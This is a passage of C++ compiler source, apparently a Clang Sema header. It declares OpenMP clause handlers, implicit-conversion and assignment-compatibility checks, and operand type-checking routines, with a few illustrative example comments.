SourceLocation EndLoc);
/// Called on well-formed 'exclusive' clause.
OMPClause *ActOnOpenMPExclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocate' clause.
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, OpenMPReductionClauseModifier Modifier,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation ModifierLoc, SourceLocation ColonLoc,
SourceLocation EndLoc, CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
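// Illustrative sketch (not from this header): a reduction clause as parsed
// into the VarList/ReductionId arguments above; '+' and 'sum' are example
// choices.
//
//   #pragma omp parallel for reduction(+ : sum)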
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'linear' clause.
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depobj' pseudo clause.
OMPClause *ActOnOpenMPDepobjClause(Expr *Depobj, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
OMPClause *
ActOnOpenMPDependClause(Expr *DepModifier, OpenMPDependClauseKind DepKind,
SourceLocation DepLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
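// Illustrative sketch (not from this header): depend clauses on tasks,
// matching the DepKind/VarList parameters above.
//
//   #pragma omp task depend(out : x)   // producer task
//   #pragma omp task depend(in : x)    // ordered after the producer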
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(OpenMPDeviceClauseModifier Modifier,
Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ModifierLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
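// Illustrative sketch (not from this header): a map clause with a map-type
// modifier and an array section, corresponding to the MapTypeModifiers/
// MapType/VarList parameters above.
//
//   #pragma omp target map(always, tofrom : a[0:n])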
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
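// Illustrative sketch (not from this header): the source forms classified by
// CheckedConversionKind.
//
//   long a = 42;                     // CCK_ImplicitConversion
//   long b = (long)42;               // CCK_CStyleCast
//   long c = long(42);               // CCK_FunctionalCast
//   long d = static_cast<long>(42);  // CCK_OtherCast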
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// The result's value kind is given by \p VK.
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of a unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This is DefaultFunctionArrayLvalueConversion,
// except that it assumes the operand isn't of function or array
// type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used by DefaultVariadicArgumentPromotion for emitting the right warning.
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collects argument expressions for the various
/// forms of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on its
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If both operands aren't arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointer types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatibleFunctionPointer - The assignment is between two function
/// pointer types that are not compatible, but we accept them as an
/// extension.
IncompatibleFunctionPointer,
/// IncompatiblePointerSign - The assignment is between two pointer types
/// which point to integers that have a different sign but are otherwise
/// identical. This is a subset of the above, but broken out because it's by
/// far the most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointer types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright; it is invalid to
/// represent it in the AST.
Incompatible
};
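// Illustrative C sketch (not from this header): assignments that land in
// some of the AssignConvertType buckets above.
//
//   int *p = 0;
//   int n = p;                      // PointerToInt (accepted as an extension)
//   unsigned int *q = p;            // IncompatiblePointerSign
//   const char **cc = (char **)0;   // IncompatibleNestedPointerQualifiers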
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// the following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType CheckGNUVectorConditionalTypes(ExprResult &Cond, ExprResult &LHS,
ExprResult &RHS,
SourceLocation QuestionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// Type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// Type checking for declaration initializers (C99 6.7.8).
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
NestedQualification = 0x2,
Function = 0x4,
DerivedToBase = 0x8,
ObjC = 0x10,
ObjCLifetime = 0x20,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
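/// Example usage (a sketch; Loc, T1, and T2 are assumed call-site values):
///
///   ReferenceConversions Conv;
///   if (CompareReferenceRelationship(Loc, T1, T2, &Conv) == Ref_Compatible
///       && (Conv & ReferenceConversions::DerivedToBase))
///     ; // binding a T1& to a T2 requires a derived-to-base adjustment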
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType ¶mType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// Returns true if the cast is invalid.
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// Returns the cast expression.
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return the converted expression, or ExprError() if there were any errors
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explicit specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
